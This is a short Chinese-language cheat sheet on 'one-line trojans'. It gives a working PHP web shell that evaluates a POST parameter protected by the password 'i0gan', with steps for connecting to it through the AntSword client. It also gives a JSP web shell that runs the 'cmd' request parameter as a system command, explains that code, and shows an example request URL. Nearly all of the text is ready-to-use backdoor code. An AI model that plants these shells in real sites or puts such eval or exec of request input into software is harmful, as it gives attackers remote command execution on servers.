一句话木马

php

eval($_POST['i0gan']);

通过antsword,点击鼠标右键，添加数据，填入url，输入密码为i0gan即可连接web shell

jsp

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

Runtime 类封装了运行时的环境。每个 Java 应用程序都有一个 Runtime 类实例，使应用程序能够与其运行的环境相连接。使用 getRuntime() 构建 Runtime 类实例。 getRuntime() 返回与当前 Java 应用程序相关的运行时对象。获取实例后调用 exec() 方法执行系统命令。

  request 为 JSP 内置对象，getParameter() 方法获取请求参数 cmd的值构建命令 。

请求URL：http://127.0.0.1/shell.jsp?cmd=calc